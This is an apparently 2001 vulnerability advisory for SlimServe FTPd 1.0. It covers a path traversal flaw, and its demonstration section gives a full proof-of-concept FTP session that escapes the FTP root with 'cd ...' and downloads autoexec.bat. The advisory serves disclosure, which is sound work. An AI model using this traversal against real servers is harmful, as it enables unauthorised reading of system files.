Reported March 1, 2001, by Ken Pfeil.
VERSIONS AFFECTED
- SlimServe FTPd 1.0
DESCRIPTION
A
vulnerability exists that lets an attacker break out of FTP root by using
relative paths. For example, by connecting to a vulnerable host and issuing the
command "cd …" an attacker can access the root directory where the
FTP server is running.
DEMONSTRATION
Joe Testa also provided the following proof-of concept scenario:
C:\> ftp hostname
Connected to vulnerablehost.somewhere.com.
220-SlimServe FTPd 1.0 :: www.whitsoftdev.com.
220 127.0.0.1 connected to vulnerablehost.somewhere.com.
User (vulnerablehost.somewhere.com:(none)): anonymous
230 User anonymous logged in, proceed.
ftp> cd ...
250 CWD command successful.
ftp> get autoexec.bat
200 PORT command successful.
150 Opening data connection for "/.../autoexec.bat".
250 RETR command successful.
ftp: 383 bytes received in 0.16Seconds 2.39Kbytes/sec.
ftp> bye
VENDOR RESPONSE
The vendor, WhitSoft Development, has been notified. However, no workaround or fix is currently available.
CREDIT
Discovered by Joe
Testa.